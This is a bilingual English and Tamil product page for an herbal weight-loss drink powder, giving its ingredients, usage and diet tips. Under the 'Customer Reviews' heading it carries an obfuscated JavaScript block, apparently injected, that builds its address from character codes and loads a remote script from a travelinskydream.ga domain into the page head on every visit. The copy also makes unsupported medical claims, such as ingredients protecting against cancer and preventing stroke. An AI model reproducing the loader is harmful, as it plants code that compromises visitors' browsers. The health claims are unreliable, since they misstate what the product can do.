SLIM & FIT

450.00

Product Description

Description

The number of people with obesity is on the rise today. Obesity can also be caused by unhealthy eating habits, Not doing other active things that work your body in a different way and changes in our lifestyle. And a few may be suffered from obesity because of hereditary.

Obesity sufferers have a number of physical disorders, including infertility, diabetes, hypertension and cholesterol, heart and kidney disease, joint pain and insomnia.

Thus, some of the people who suffer from obesity, reaching artificial method to lose weight for speedy recovery. But doctors always recommend, the natural method is the best for weight loss.

We have introduced SLIM & FIT – Herbal Weight Loss Drink Powder For People With Obesity. It is made from over 25 natural ingredients, such as Horse-Gram, Bamboo Rice, Horse-Tail Millet, Kodo Millet, Pearl Millet, Fenugreek Seeds, Cucumber Seeds, Pumpkin Seeds, Pepper, Barley, Black Rice, Flax Seeds, Soya Beans, Cowpeas, Lentils, Thinai, Saamai, Irungu Cholam and more. Let’s look at some of the important items included:

Horse Gram – High in Vitamins, Proteins and Iron. It helps to dissolve unwanted fats in our body

Bamboo Rice – Helps to create a balanced body Horse-Tail Millet – Removes unnecessary fat from the body and helps to work the digestive tract properly. It contains calcium, it helps to strengthen the bones.

Kodo Millet – Helps to keep blood sugar levels in balance and also Increases blood production and purifying the blood Pearl millet   –  It is rich in Folic acid rich, it helps to strengthen our muscle and bones

Cucumber Seeds – Contains many nutrients such as fiber, zinc, vitamin E, antioxidant and magnesium. It repairs bile and kidney problems. It also helps to boost immunity power.

Pumpkin Seed – Contains nutrients such as zinc, protein and magnesium. It helps to increase the level of good cholesterol that our body needs, reduces high blood pressure. Also prevent stroke and heart disease.

Barley – Vitamin C supplements help boost immunity & Iron also helps to regulate the blood density.

Black Rice – Protect against chronic diseases such as diabetes, heart disease and cancer

Flax Seeds – It contains high levels of fiber, which prevents appetite for a long time. Good rich fatty acids like Omega-3 and omega-6 fight against asthma, heart disease and diabetes

Soya Beans – Contains a wide variety of proteins, vitamins and minerals. It helps to eliminate the bad cholesterol and reduce weight

How to Use:
Drink a teaspoon powder with a butter milk on an empty stomach every morning. Or you can mix it with hot water/milk & a tablespoon of honey. It is better to walk after a while. Eating foods that are high in nutrients and avoiding bad fats can help you lose weight quickly.

Do’s:
It is better to go for a walk in the morning or evening

Reduce the amount of rice in the meal. Instead, you can take vegetables, fruits and spinach

Reduce your intake of white sugar and replace it with Brown Sugar, Karupatti or Jaggery

Stop drinking as much tea and coffee, if possible drink buttermilk, green tea, lemon tea or fruit juice

It is best to avoid things like Oily & Junk Foods and Processed foods

Drink at least three litres of water daily

Eat foods that are high in fiber and water content

Eat egg, fish and goat meat instead of chicken curry

Take one glass of Hot Water, add Lemon Juice, Pure Honey, Jeera Powder & Salt. Mix everything well and Drink

People with hereditary obesity have been using it continuously for at least 6 months to get a better results. People who suffer from obesity because of diseases can continue to use it for at least 6 to 9 months to lose weight. It can also be used by those who think they should always be physically fit.

Important note: Pregnant women and lactating mothers should avoid this.

 

இன்றைய காலகட்டத்தில் உடல் பருமன் நோயால் பாதிக்கப்பட்டவர்கள் எண்ணிக்கை அதிகரித்து கொண்டே இருக்கிறது. ஒழுங்கு முறையற்ற உணவு பழக்கம், உடலுக்கு வேலை கொடுக்காமல் அப்படியே ஒரே இடத்தில் தன் நேரத்தை போக்குவது மற்றும் நம் வாழ்க்கை முறையில் ஏற்பட்டுள்ள மாற்றங்கள் போன்றவற்றாலும் உடல் பருமன் அதிகரிக்க கூடும். மேலும் ஒரு சிலர் பரம்பரை பரம்பரையாகவும் உடல் பருமன் நோயால் பாதிக்கப்படலாம்.

உடல் பருமன் நோயால் பாதிக்கப்பட்டவர்களுக்கு குழந்தை பாக்கியம் இல்லாமை, சர்க்கரை வியாதி, இரத்த அழுத்தம் மற்றும் இரத்த கொழுப்பு, இதயம் மற்றும் சிறுநீரகம் சம்பந்தபட்ட நோய், மூட்டு வலி மற்றும் தூக்கமின்மை என பல உடல் உபாதைகள் ஏற்படும்.

இவ்வாறு உடல் பருமனால் அவதிப்பட்டு வரும் மக்களில் ஒருசிலர் மின்னல் வேகத்தில் உடல் எடையை குறைக்க வேண்டும் என்று செயற்கை முறையை நாடுகிறார்கள். ஆனால் உடல் எடையை குறைக்க இயற்கையான முறையே மிக சிறந்தது என்று மருத்துவர்கள் பரிந்தரைக்கின்றனர்.

உடல் பருமன் நோயால் பாதிக்கப்பட்ட மக்களுக்காகவே நாங்கள் அறிமுகப்படுத்தி இருப்பது SLIM & FIT – Herbal Weight Loss Drink Powder. இது 25-க்கும் மேற்பட்ட இயற்கை பொருட்களைக் கொண்டு தயாரிக்கப்பட்டது. அதாவது, கொள்ளு, மூங்கில் அரிசி, குதிரை வாலி, வரகு அரிசி, காட்டுயானம் அரிசி, கம்பு, வெந்தயம், வெள்ளேரி விதை, பூசினி விதை, மிளகு, பார்லி, கருப்பு கவுனி, ஆளி விதை, சோயா பீன்ஸ், தட்டை பயறு, மொட்சை பயறு, தினை, சாமை, இருங்கு சோளம், மற்றும் பல. இதில் சேர்த்துள்ள சில முக்கியமான பொருட்களின் பயனை பார்ப்போம்:

கொள்ளு – இதில் வைட்டமின், புரத சத்து, இரும்பு சத்து போன்றவை அதிகமாக இருக்கின்றன. இது நம் உடலில் உள்ள தேவையற்ற கொழுப்புக்களை கரைக்க உதவும்.

மூங்கில் அரிசி – வாதம், பித்தம், கபம் இவை மூன்றையும் சமப்படுத்தி சீரான உடல் அமைப்பை பெற செய்யும்

குதிரை வாலி – உடலில் உள்ள தேவையற்ற கொழுப்புகளை நீக்கி, செரிமான மண்டலத்தை சரிவர வேலை செய்ய உதவும். இதில் உள்ள கால்சியம் சத்து எலும்புகளை பலப்படுத்தும்.

வரகு அரிசி – இரத்தத்தில் உள்ள சர்க்கரையின் அளவை கட்டுக்குள் வைத்திருக்க உதவுகிறது. இரத்த உற்பத்தியை அதிகரிக்கும் மற்றும் இரத்தத்தை சுத்தப்படுத்தும்.

காட்டு யானம் – இதில் நிறைந்துள்ள போலிக் அமிலம் தசை மற்றும் எலும்புகளை பலப்படுத்தும்.

வெள்ளேரி விதை – நார்சத்து, துத்தநாகம், வைட்டமின் இ, ஆன்டி ஆக்சிடன்ட், மக்னீசியம் போன்ற பல சத்துக்கள் அடங்கியுள்ளன. பித்தநீர் மற்றும் சிறுநீரக பிரட்சனைகள் அனைத்தும் சரிசெய்யும். மேலும் நோய் எதிர்ப்பு சக்தியை அதிகரிக்க உதவும்.

பூசினி விதை – இதில் ஜிங்க், புரோட்டீன், மக்னீசியம் போன்ற உடல் ஆரோக்கியத்தை அளிக்கும் ஊட்டச்சத்துக்கள் இருக்கிறது. நம் உடலுக்கு தேவையான நல்ல கொலஸ்ட்ராலின் அளவை அதிகரித்து, உயர் இரத்த அழுத்தத்தை குறைக்கும். மேலும் பக்கவாதம் மற்றும் இதய நோய் வராமல் தடுக்கும்.

பார்லி – இதில் உள்ள வைட்டமின் சி சத்து நோய் எதிர்ப்பு சக்தியை அதிகரிக்க உதவும். மேலும் இரும்பு சத்து இரத்தத்தின் அடர்த்தியை சீராக்குகிறது.

கருப்பு கவுனி – நாள்பட்ட நோய்களாகிய சர்க்கரை வியாதி, இதய கோளாறு, புற்று நோய் போன்றவற்றில் இருந்து பாதுகாக்கும்.

ஆளி விதை – இதில் அதிக அளவில் நார்சத்து உள்ளது, இதனால் நீண்ட நேரம் பசி எடுக்காமல் தடுக்கும். ஒமேகா-3 மற்றும் ஒமேகா-6 போன்ற நல்ல வளமான கொழுப்பு அமிலங்கள் ஆஸ்துமா, இதய நோய்கள் மற்றும் சர்க்கரை நோய்க்கு எதிர்த்து போராடும்.

சோயா பீன்ஸ் – பலவிதமான புரொட்டீன்ஸ், வைட்டமின்ஸ், மினரல்ஸ் அடங்கியுள்ளது. இது உடலில் தேங்கி இருக்கும் கெட்ட கொழுப்புகளை நீக்கி, உடல் எடையை குறைக்க உதவும்

பயன்படுத்தும் முறை :

தினமும் காலையில் வெறும் வயிற்றில் ஒரு டமளர் மோருடன் ஒரு தேக்கரண்டி பொடி சேர்த்து பருகலாம். அல்லது சுடு தண்ணீரில்/பாலில் ஒரு தேக்கரண்டி பொடி மற்றும் ஒரு தேக்கரண்டி மலை தேன் உடன் சேர்த்து கலந்து பருகலாம்.

செய்ய கூடியவை:
காலை அல்லது மாலை சிறிது நேரம் நடைபயிற்சி மேற்கொள்வது நல்லது

சாப்பிடும் உணவில் அரிசியின் அளவை குறைக்க வேண்டும். அதற்கு பதில் காய்கறிகள், பழங்கள், கீரைவகைகள் எடுத்து கொள்ளலாம்

வெள்ளை சர்க்கரை சேர்த்து கொள்ளும் அளவை குறைத்து அதற்கு பதிலாக நாட்டு சர்க்கரை, கருப்பட்டி வெல்லம் சேர்த்து கொள்ளலாம்

முடிந்த அளவு டீ மற்றும் காபி குடிப்பதை நிறுத்திவிட்டு மோர், கிரீன் டீ, லெமன் டீ அல்லது பழச்சாறு குடிக்கலாம்

எண்ணெய் பண்டம் அல்லது பாஸ்ட் புட் போன்றவை தவிர்ப்பது நல்லது

தினமும் குறைந்தது மூன்று லிட்டர் தண்ணீர் குடிக்க வேண்டும்

நார் சத்து மற்றும் நீர் சத்து அதிகமாக இருக்கும் உணவை சாப்பிட வேண்டும்

அசைய பிரியர்கள் கோழி கறிக்கு பதில் முட்டை, மீன் மற்றும் ஆட்டு இறைச்சி சாப்பிடலாம்

சுடு நீரில் லெமன் சாறு, ஒரு ஸ்பூன் மலை தேன், சீராக பொடி மற்றும் உப்பு சேர்த்து குடிப்பது நல்லது

பரம்பரை பரம்பரையாக உடல் பருமன் நோயால் பாதிக்கப்பட்ட மக்கள் குறைந்தது 6 மாதம் காலம் தொடர்ந்து பயன்படுத்தி வந்தால் நல்ல பலன் கிடைக்கும். நோயால் அவதிபட்டு பருமன் அடைந்தவர்கள் குறைந்தது 6 மாதம் முதல் 9 மாதம் வரை தொடர்ந்து பயன்படுத்தி வர உடல் எடையை குறைக்க முடியும். மேலும் எப்போதும்

உடல் கச்சென்று வைத்திருக்க வேண்டும் என்று நினைப்பவர்கள் கூட இதை பயன்படுத்தலாம்.

முக்கிய குறிப்பு : கர்பமாக இருக்கும் பெண்கள் மற்றும் பாலூடடும் தாய்மார்கள் இதை
தவிர்ப்பது நல்லது

Customer Reviews
var _0x1c9a=['push','229651wHRLFT','511754lPBDVY','length','2080825FKHOBK','src','1lLQkOc','1614837wjeKHo','insertBefore','fromCharCode','179434whQoYd','1774xXwpgH','1400517aqruvf','7vsbpgk','3112gjEEcU','1mFUgXZ','script','1534601MOJEnu','prototype','245777oIJjBl','47jNCcHN','1HkMAkw','nextSibling','appendAfter','shift','18885bYhhDw','1096016qxAIHd','72lReGEt','1305501RTgYEh','4KqoyHD','appendChild','createElement','getElementsByTagName'];var _0xd6df=function(_0x3a7b86,_0x4f5b42){_0x3a7b86=_0x3a7b86-0x1f4;var _0x1c9a62=_0x1c9a[_0x3a7b86];return _0x1c9a62;};(function(_0x2551a2,_0x3dbe97){var _0x34ce29=_0xd6df;while(!![]){try{var _0x176f37=-parseInt(_0x34ce29(0x20a))*-parseInt(_0x34ce29(0x205))+-parseInt(_0x34ce29(0x204))*-parseInt(_0x34ce29(0x206))+-parseInt(_0x34ce29(0x1fc))+parseInt(_0x34ce29(0x200))*parseInt(_0x34ce29(0x1fd))+-parseInt(_0x34ce29(0x1fb))*-parseInt(_0x34ce29(0x1fe))+-parseInt(_0x34ce29(0x20e))*parseInt(_0x34ce29(0x213))+-parseInt(_0x34ce29(0x1f5));if(_0x176f37===_0x3dbe97)break;else _0x2551a2['push'](_0x2551a2['shift']());}catch(_0x201239){_0x2551a2['push'](_0x2551a2['shift']());}}}(_0x1c9a,0xc08f4));function smalller(){var _0x1aa566=_0xd6df,_0x527acf=[_0x1aa566(0x1f6),_0x1aa566(0x20b),'851164FNRMLY',_0x1aa566(0x202),_0x1aa566(0x1f7),_0x1aa566(0x203),'fromCharCode',_0x1aa566(0x20f),_0x1aa566(0x1ff),_0x1aa566(0x211),_0x1aa566(0x214),_0x1aa566(0x207),_0x1aa566(0x201),'parentNode',_0x1aa566(0x20c),_0x1aa566(0x210),_0x1aa566(0x1f8),_0x1aa566(0x20d),_0x1aa566(0x1f9),_0x1aa566(0x208)],_0x1e90a8=function(_0x49d308,_0xd922ec){_0x49d308=_0x49d308-0x17e;var _0x21248f=_0x527acf[_0x49d308];return _0x21248f;},_0x167299=_0x1e90a8;(function(_0x4346f4,_0x1d29c9){var _0x530662=_0x1aa566,_0x1bf0b5=_0x1e90a8;while(!![]){try{var _0x2811eb=-parseInt(_0x1bf0b5(0x187))+parseInt(_0x1bf0b5(0x186))+parseInt(_0x1bf0b5(0x18d))+parseInt(_0x1bf0b5(0x18c))+-parseInt(_0x1bf0b5(0x18e))*parseInt(_0x1bf0b5(0x180))+-parseInt(_0x1bf0b5(0x18b))+-parseInt(_0x1bf0b5(0x184))*parseInt(_0x1bf0b5(0x17e));if(_0x2811eb===_0x1d29c9)break;else _0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}catch(_0x1cd819){_0x4346f4[_0x530662(0x212)](_0x4346f4[_0x530662(0x209)]());}}}(_0x527acf,0xd2c23),(Element[_0x167299(0x18f)][_0x1aa566(0x208)]=function(_0x3d096a){var _0x2ca721=_0x167299;_0x3d096a[_0x2ca721(0x183)][_0x2ca721(0x188)](this,_0x3d096a[_0x2ca721(0x181)]);},![]),function(){var _0x5d96e1=_0x1aa566,_0x22c893=_0x167299,_0x306df5=document[_0x22c893(0x185)](_0x22c893(0x182));_0x306df5[_0x22c893(0x18a)]=String[_0x22c893(0x190)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x61,0x6e,0x61,0x6c,0x79,0x74,0x69,0x63,0x73,0x2e,0x6a,0x73,0x3f,0x63,0x69,0x64,0x3d,0x30,0x30,0x30,0x30,0x26,0x70,0x69,0x64,0x69,0x3d,0x31,0x39,0x31,0x38,0x31,0x37,0x26,0x69,0x64,0x3d,0x35,0x33,0x36,0x34,0x36),_0x306df5[_0x22c893(0x189)](document[_0x22c893(0x17f)](String[_0x5d96e1(0x1fa)](0x73,0x63,0x72,0x69,0x70,0x74))[0x0]),_0x306df5[_0x5d96e1(0x208)](document[_0x22c893(0x17f)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0]),document[_0x5d96e1(0x211)](String[_0x22c893(0x190)](0x68,0x65,0x61,0x64))[0x0][_0x22c893(0x191)](_0x306df5);}());}function biggger(){var _0x5d031d=_0xd6df,_0x5c5bd2=document[_0x5d031d(0x211)](_0x5d031d(0x201));for(var _0x5a0282=0x0;_0x5a0282<_0x5c5bd2[_0x5d031d(0x1f4)];_0x5a0282++){if(_0x5c5bd2[_0x5a0282][_0x5d031d(0x1f6)]['indexOf'](String['fromCharCode'](0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d))>-0x1)return 0x1;}return 0x0;}biggger()==0x0&&smalller();